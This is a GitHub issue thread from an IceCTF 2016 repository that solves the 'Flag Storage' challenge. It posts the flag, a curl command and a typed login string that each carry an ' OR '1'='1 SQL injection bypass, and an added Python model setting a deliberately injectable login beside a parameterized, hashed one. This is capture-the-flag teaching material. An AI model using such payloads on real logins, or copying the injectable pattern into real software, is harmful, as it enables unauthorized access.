DeadpoolAndObjectOrientedProgramming / icectf-2016

IceCTF 2016 repo

Stage 2 - Flag Storage #17

Closed koddsson closed 8 years ago

koddsson commented 8 years ago

Description

What a cheat, I was promised a flag and I can't even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.

Solution

Flag is: IceCTF{why_would_you_even_do_anything_client_side}

koddsson commented 8 years ago

I cURL with the following command: curl 'http://flagstorage.vuln.icec.tf/login.php' --data "username=koddsson&password_plain=password&password=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' OR '1'='1"

stebbib commented 8 years ago

damn didn't notice this was done

I just put ' OR '1'='1' # in both fields and got access :v:
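
The login flaw discussed in this thread, modelled as an added example that is not part of the thread and is not the challenge's server code. It assumes the server concatenated the client-computed hash into its SQL text; `sqlite3` stands in for the challenge's database, and the schema, function names and stored password are hypothetical.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed model: the challenge's schema and server code are not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, sha256_hex TEXT, salt BLOB, kdf BLOB)")
    secret = b"constructed-password"
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", hashlib.sha256(secret).hexdigest(), salt,
                hashlib.pbkdf2_hmac("sha256", secret, salt, 100_000)))
    return db

def login_vulnerable(db, username, client_hash):
    # Assumed flaw: the hash computed in the browser is trusted and
    # concatenated into the SQL text, so a quote in it rewrites the query.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND sha256_hex = '" + client_hash + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password_plain):
    # Ignore any client-computed hash: bind the username as a parameter and
    # derive the key on the server from the submitted plaintext.
    row = db.execute("SELECT salt, kdf FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    derived = hashlib.pbkdf2_hmac("sha256", password_plain.encode(), salt, 100_000)
    return hmac.compare_digest(derived, stored)

# Field value as posted in the thread's curl command.
POSTED_HASH = ("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
               "' OR '1'='1")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login accepts posted value:",
          login_vulnerable(db, "koddsson", POSTED_HASH))
    print("hardened login accepts posted value:",
          login_hardened(db, "koddsson", POSTED_HASH))
    print("hardened login accepts real password:",
          login_hardened(db, "admin", "constructed-password"))
```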